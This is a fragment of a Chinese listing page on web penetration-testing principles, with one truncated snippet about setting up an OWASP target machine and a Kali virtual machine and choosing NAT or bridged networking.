  • WEB渗透测试 准备环境 步骤1 安装 1 owasp靶机安装 2 kali虚拟机安装 步骤2 网线选择 NAT方式:虚拟机可以上网,外部无法访问虚拟机 桥接方式:虚拟机可以上网,外部也可以访问虚拟机 dhclient -v eth0//...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 12,171
精华内容 4,868
关键字:

web渗透原理

友情链接: sed1335.rar